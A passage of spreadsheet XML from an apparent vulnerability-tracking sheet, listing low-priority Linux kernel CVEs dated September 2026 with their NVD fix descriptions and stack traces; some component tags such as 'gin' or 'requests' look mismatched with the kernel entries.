Fix it by keeping _PAGE_DIRTY in the preserved mask, exactly like
pte_modify() and pud_modify() do.  The existing
pmd_mksaveddirty()/pmd_clear_saveddirty() pair then performs the
hardware-dirty &lt;-&gt; saved-dirty transition based on the write bit,
preserving the shadow-stack encoding rules.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97945</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97946</t>
        </is>
      </c>
      <c r="D589" s="5" t="inlineStr"/>
      <c r="E589" s="5" t="inlineStr"/>
      <c r="F589" s="5" t="inlineStr"/>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr">
        <is>
          <t>tempo, go</t>
        </is>
      </c>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr"/>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/amd_node: Fix PCI device reference counting in amd_smn_init()
The local "root" pointer is a temporary variable used during the device
search. Therefore, refcount related to the search iterators should be cleaned
up after the search is complete.
Use the __free() cleanup macro to ensure the refcount is decremented when the
temporary pointer goes out of scope.
Additionally, increment the refcount when caching a root pointer. This ensures
the in-use refcount is separate from the temporary search refcounting.
Finally, drop the redundant "root = NULL" before the second search loop. The
pci_get_class() iterator always decrements the refcount of its "from"
argument, so the first loop can only fall through with "root" already NULL.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97946</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97947</t>
        </is>
      </c>
      <c r="D590" s="5" t="inlineStr"/>
      <c r="E590" s="5" t="inlineStr"/>
      <c r="F590" s="5" t="inlineStr"/>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr"/>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/amd_node: Fix potential NULL pointer dereference
amd_smn_read/write() are exported functions around __amd_smn_rw(), so
they are always available even if amd_smn_init() fails. In that case,
'amd_roots' is NULL and __amd_smn_rw() will access uninitialized memory.
Then, commit:
  83518453074d ("x86/amd_node: Add SMN offsets to exclusive region access")
added the 'smn_exclusive' flag, which indicated the calls to
pci_request_config_region_exclusive() succeeded, to prevent
concurrent userspace access.
Commit:
  0a4b61d9c2e4 ("x86/amd_node: Fix AMD root device caching")
re-ordered initialization so pci_request_config_region_exclusive() is
called earlier and a failure exits amd_smn_init() before allocating
'amd_roots'. The setting of 'smn_exclusive' moved to the end of
amd_smn_init(), after 'amd_roots' is allocated. It became redundant
and can be removed.
Replace 'smn_exclusive' with directly checking 'amd_roots', to fix a
potential NULL pointer dereference and to simplify the logic.
  [ bp: Reorg commit message, touchup comment. ]
  [ mingo: Rebase &amp; further touchups. ]</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97947</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97948</t>
        </is>
      </c>
      <c r="D591" s="5" t="inlineStr"/>
      <c r="E591" s="5" t="inlineStr"/>
      <c r="F591" s="5" t="inlineStr"/>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="inlineStr"/>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr"/>
      <c r="S591" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/eeh: Fix recursive locking on devices without EEH sensitive driver
The commit 1010b4c012b0 ("powerpc/eeh: Make EEH driver device hotplug
safe") refactored the EEH code such that the pci_rescan_remove_lock is
held at the beginning of eeh_handle_normal_event() and the
eeh_reset_device() is called with that lock being held. Looks like the
commit missed to remove the existing lock/unlock inside eeh_rmv_device()
which is no longer necessary. This is causing the eehd to hang on the
lock which it actually holds when that code path is taken.
[&lt;0&gt;] 0xc00000011c78f870
[&lt;0&gt;] __switch_to+0xfc/0x1a0
[&lt;0&gt;] pci_lock_rescan_remove+0x30/0x44
[&lt;0&gt;] eeh_rmv_device+0x290/0x2e0
[&lt;0&gt;] eeh_pe_dev_traverse+0x80/0x130
[&lt;0&gt;] eeh_reset_device+0xcc/0x23c
[&lt;0&gt;] eeh_handle_normal_event+0x830/0xa80
[&lt;0&gt;] eeh_event_handler+0xf8/0x190
[&lt;0&gt;] kthread+0x194/0x1b0
[&lt;0&gt;] start_kernel_thread+0x14/0x18
The issue is seen for cases where the errors are detected on the PHB
directly AND|OR for devices where the driver error_detected() returns
PCI_ERS_RESULT_NEED_RESET, and driver being not EEH sensitive(i.e no
error handlers like slot_reset(), resume() etc defined).</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97948</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97949</t>
        </is>
      </c>
      <c r="D592" s="5" t="inlineStr"/>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="inlineStr"/>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr"/>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
configfs: unhash the dentry before dropping the item in rmdir
configfs_get_config_item() treats a hashed dentry as proof that
sd-&gt;s_element is a live config_item.  configfs_rmdir() breaks that:
simple_rmdir() leaves the dentry hashed, the last reference to the item is
dropped right after, and the dentry is only unhashed by d_delete() once
-&gt;rmdir() has returned.  configfs_symlink() resolves its target holding no
lock on it, so get_target() can land in that window:
  BUG: KASAN: slab-use-after-free in config_item_get+0x26/0x90
   get_target fs/configfs/symlink.c:128 [inline]
   configfs_symlink+0x4ab/0x1030 fs/configfs/symlink.c:185
Unhash in configfs_remove_dir(), while the item is still guaranteed to be
there.  A reference obtained just before that stays harmless, as
create_link() rechecks CONFIGFS_USET_DROPPING, already set by
configfs_detach_prep().  Both configfs_unregister_subsystem() paths
d_drop() after detaching, so this only makes rmdir match them.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97949</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97950</t>
        </is>
      </c>
      <c r="D593" s="5" t="inlineStr"/>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="inlineStr"/>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr"/>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
configfs: pin the symlink target's dirent instead of chasing -&gt;ci_dentry
create_link() reads the target's configfs_dirent from
item-&gt;ci_dentry-&gt;d_fsdata, relying on the item reference taken by
get_target().  That reference pins the item, not its dentry: the dentry is
pinned by DCACHE_PERSISTENT, which configfs_remove_dir() releases via
simple_rmdir() while the item is still alive.  A symlink racing with rmdir
of its target can therefore find -&gt;ci_dentry freed and its dirent
released, triggering WARN_ON(!atomic_read(&amp;sd-&gt;s_count)) in configfs_get().
Take the dirent in get_target() as well, under -&gt;d_lock and atomically
with the item reference, and pass it down to create_link().  A hashed
dentry has not been killed yet, so its -&gt;d_fsdata reference keeps the
dirent alive there.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97950</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97951</t>
        </is>
      </c>
      <c r="D594" s="5" t="inlineStr"/>
      <c r="E594" s="5" t="inlineStr"/>
      <c r="F594" s="5" t="inlineStr"/>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr"/>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: target: iscsi: Fix hang for aborted WRITE_PENDING commands
When a LUN_RESET aborts a WRITE command that is in the
TRANSPORT_WRITE_PENDING state, the target core sets CMD_T_ABORTED and
waits for the frontend to finish processing.
If the initiator subsequently sends the remaining dataout PDUs,
__iscsit_check_dataout_hdr() catches the payload, stops the dataout
timer if the sequence is final and finally dumps the data.  However, the
iSCSI target doesn't trigger the completion process for these aborted
commands. Because of this, the abort path hangs indefinitely in
target_put_cmd_and_wait(), leading to a deadlocked target worker thread.
Fix this by explicitly calling target_complete_cmd() when the final
dataout PDU is received for an aborted WRITE command.
target_complete_cmd() detects the CMD_T_ABORTED flag and cleanly routes
the command into target_abort_work, allowing the abort completion to
successfully unblock.</t>
        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97951</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97952</t>
        </is>
      </c>
      <c r="D595" s="5" t="inlineStr"/>
      <c r="E595" s="5" t="inlineStr"/>
      <c r="F595" s="5" t="inlineStr"/>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr"/>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunvdc: unmap LDC cookies when the descriptor send fails
__send_request() maps the request's pages into the LDC channel's map
table (ldc_map_sg()), fills in the descriptor and marks it
VIO_DESC_READY before ringing the doorbell via __vdc_tx_trigger().
When the trigger fails, the error path only prints a message: the
descriptor stays READY and the cookies are never unmapped. The
mapping is normally released in vdc_end_one() when the peer completes
the descriptor - but a descriptor whose doorbell was never sent will
never complete, and since dr-&gt;prod is not advanced on failure, the
reset path (vdc_requeue_inflight(), which walks [cons, prod)) never
visits it either. The map table entries are leaked permanently.
Since commit a11f6ca9aef9 ("sunvdc: Do not spin in an infinite loop
when vio_ldc_send() returns EAGAIN") trigger failures occur in
practice under load, so every resulting I/O error also leaks one
request's worth of entries from the fixed-size (8192 entries per
channel) map table. Because the allocator hands out contiguous
ranges, fragmentation makes large multi-segment requests fail first
as the table drains, until ldc_map_sg() fails permanently and the
disk is dead until reboot.
It also makes any retry-based recovery unusable: requeuing the
request on -EAGAIN remaps the pages on every attempt, overwriting
desc-&gt;cookies and orphaning the previous mapping, so the table
drains at the retry rate. This is the memory exhaustion observed
when the requeue approach was first tested in October 2025.
Roll back on failure: unmap the cookies, mark the descriptor FREE
again and clear the request entry. If the trigger failed with
-ENOTCONN, __vdc_tx_trigger() has already reset the port, which
tears down and reallocates both the dring and the LDC channel
including its map table - nothing to roll back, and the stale
descriptor must not be touched.</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97952</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97954</t>
        </is>
      </c>
      <c r="D596" s="5" t="inlineStr"/>
      <c r="E596" s="5" t="inlineStr"/>
      <c r="F596" s="5" t="inlineStr"/>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr"/>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: fix tcp stream corruption with large pages
rds_message_map_pages() assigns PAGE_SIZE bytes to every
scatterlist entry, even when total_len ends in a partial page. The RDS
congestion map is defined as 8192 bytes, so on systems with PAGE_SIZE
greater than 8192 the scatterlist maps bytes beyond the end of the
congestion map.  RDS-TCP transmits the SG contents according to those
lengths, so the extra bytes become part of the TCP RDS stream and are
interpreted as subsequent RDS message headers, corrupting the stream.
Limit the final scatterlist mapping to the number of bytes remaining.
This has no effect on systems with a 4K page size and allows RDS-TCP to
be used on systems with 16K and larger page sizes.
The RDS selftest, which previously hung on 16K pages, now passes.</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97954</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97955</t>
        </is>
      </c>
      <c r="D597" s="5" t="inlineStr"/>
      <c r="E597" s="5" t="inlineStr"/>
      <c r="F597" s="5" t="inlineStr"/>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="inlineStr"/>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr"/>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mana: restore the XDP program pointer when pre-allocation fails
mana_xdp_set() publishes the new program into apc-&gt;bpf_prog before it
allocates anything, because mana_pre_alloc_rxbufs() sizes the buffers
from it via mana_get_rxbuf_cfg(). When that allocation fails the
function returns the error directly, skipping the err_dealloc_rxbuffs
label which is the only place that restores the previous pointer.
The attach is reported as failed, so the BPF core drops the reference it
held for the caller and the program can be freed, while apc-&gt;bpf_prog
still points at it. The next consumer of mana_xdp_get() - typically
mana_chn_setxdp() from mana_alloc_queues() on the following ifup, or
after a TX timeout reset - then calls bpf_prog_add() on freed memory.
This is reachable from an ordinary "ip link set dev ethX xdp obj ..."
whenever the per-queue RX buffer pre-allocation cannot be satisfied.
Restore the previous program on that error path.</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97955</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97956</t>
        </is>
      </c>
      <c r="D598" s="5" t="inlineStr"/>
      <c r="E598" s="5" t="inlineStr"/>
      <c r="F598" s="5" t="inlineStr"/>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="inlineStr"/>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr"/>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: net_failover: Fix the deadlock in net_failover_slave_name_change()
This is a sibling fix of commit
b84c5632c7b3 ("net: net_failover: Fix the deadlock in slave register").
There is netdev_lock_ops() in the upper callers, so using netif_open()
instead of dev_open().
Call Trace:
 __schedule+0x2bb/0x650
 schedule+0x27/0xb0
 schedule_preempt_disabled+0x15/0x30
 __mutex_lock.constprop.0+0x550/0xaf0
 __mutex_lock_slowpath+0x13/0x20
 mutex_lock+0x3b/0x50
 dev_open+0x3b/0xe0
 net_failover_slave_name_change+0x22/0x40
 failover_event+0xd4/0x1e0
 notifier_call_chain+0x62/0xf0
 raw_notifier_call_chain+0x16/0x30
 call_netdevice_notifiers_info+0x50/0x80
 netif_change_name+0x200/0x330
 do_setlink.isra.0+0xb12/0xdf0
 ? security_capable+0x9a/0x1e0
 ? ns_capable+0x31/0x60
 rtnl_setlink+0x302/0x670
 ? netlink_recvmsg+0x296/0x340
 ? security_capable+0x9a/0x1e0
 ? __pfx_rtnl_setlink+0x10/0x10
 rtnetlink_rcv_msg+0x384/0x460
 ? __pfx_rtnetlink_rcv_msg+0x10/0x10
 netlink_rcv_skb+0x61/0x120
 rtnetlink_rcv+0x15/0x30
 netlink_unicast+0x28f/0x3c0
 netlink_sendmsg+0x216/0x450
 __sys_sendto+0x222/0x230
 __x64_sys_sendto+0x24/0x40
 x64_sys_call+0x1d5d/0x2390
 do_syscall_64+0x105/0x5a0
 ? do_syscall_64+0x140/0x5a0
 ? exc_page_fault+0x94/0x1e0
 entry_SYSCALL_64_after_hwframe+0x76/0x7e</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97956</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97958</t>
        </is>
      </c>
      <c r="D599" s="5" t="inlineStr"/>
      <c r="E599" s="5" t="inlineStr"/>
      <c r="F599" s="5" t="inlineStr"/>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="inlineStr"/>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr">
        <is>
          <t>f5, requests</t>
        </is>
      </c>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr"/>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_api: Don't replay RTM_GETCHAIN in tc_ctl_chain().
If a netlink socket sends RTM_GETCHAIN requests repeatedly
without recv()ing the responses, tc_ctl_chain() hogs CPU and
triggers Hung Task splat. [0]
As caught in the stack trace, netlink_attachskb() could confuse
tc_ctl_chain() by returning -EAGAIN when the userspace netlink
socket's receive buffer is full.
The replay: label exists since commit 32a4f5ecd738 ("net: sched:
introduce chain object to uapi") but was not used initially.
Since commit 9f407f1768d3 ("net: sched: introduce chain templates"),
the label is needed for RTM_NEWCHAIN because tcf_proto_lookup_ops()
may release RTNL to call request_module().
However, the replay logic is unnecessary for RTM_GETCHAIN.
Let's apply the replay logic only for RTM_NEWCHAIN.
[0]:
INFO: task repro:1018 is blocked on a mutex likely owned by task repro:1022.
task:repro           state:R  running task     stack:14096 pid:1022  tgid:1014  ppid:961    task_flags:0x400040 flags:0x00080000
Call Trace:
 &lt;TASK&gt;
 ? clockevents_program_event (kernel/time/clockevents.c:372)
 ? pskb_expand_head (net/core/skbuff.c:615)
 ? skb_release_data (net/core/skbuff.c:1122)
 ? netlink_attachskb (./include/linux/skbuff.h:1323 ./include/linux/skbuff.h:1332 net/netlink/af_netlink.c:1232)
 ? __netlink_lookup (./include/linux/rcupdate.h:882 ./include/linux/rhashtable.h:711 net/netlink/af_netlink.c:499)
 ? tc_chain_notify (net/sched/cls_api.c:3045)
 ? tc_chain_notify (./include/linux/skbuff.h:1384 net/sched/cls_api.c:3041)
 ? netlink_unicast (net/netlink/af_netlink.c:1335)
 ? rtnl_unicast (./include/net/netlink.h:1198 net/core/rtnetlink.c:985)
 ? tc_ctl_chain (net/sched/cls_api.c:3242)
 ? rtnetlink_rcv_msg (net/core/rtnetlink.c:7146)
 ? netlink_unicast (net/netlink/af_netlink.c:1354)
 ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:7177)
 ? netlink_rcv_skb (net/netlink/af_netlink.c:2556)
 ? netlink_unicast (net/netlink/af_netlink.c:1319)
 ? netlink_sendmsg (net/netlink/af_netlink.c:1900)
 ? __sock_sendmsg (net/socket.c:800)
 ? __sys_sendto (net/socket.c:2281)
 ? __x64_sys_sendto (net/socket.c:2288 net/socket.c:2284 net/socket.c:2284)
 ? do_syscall_64 (arch/x86/entry/syscall_64.c:61 arch/x86/entry/syscall_64.c:84)
 ? entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97958</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97959</t>
        </is>
      </c>
      <c r="D600" s="5" t="inlineStr"/>
      <c r="E600" s="5" t="inlineStr"/>
      <c r="F600" s="5" t="inlineStr"/>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="inlineStr"/>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr"/>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_route: free emptied bucket on filter move
route4_change can move an existing filter to a different top-level
bucket: route4_set_parms recomputes the handle from TCA_ROUTE4_TO/
FROM/IIF, and the handle-mismatch check is gated on the 'new' flag, so
for an existing filter the new handle may differ from the old one and
land in a different bucket. When this happens, the filter is unlinked
from the old bucket, but the bucket itself is never freed once it goes
empty. The stale empty bucket remains in head-&gt;table[], causing
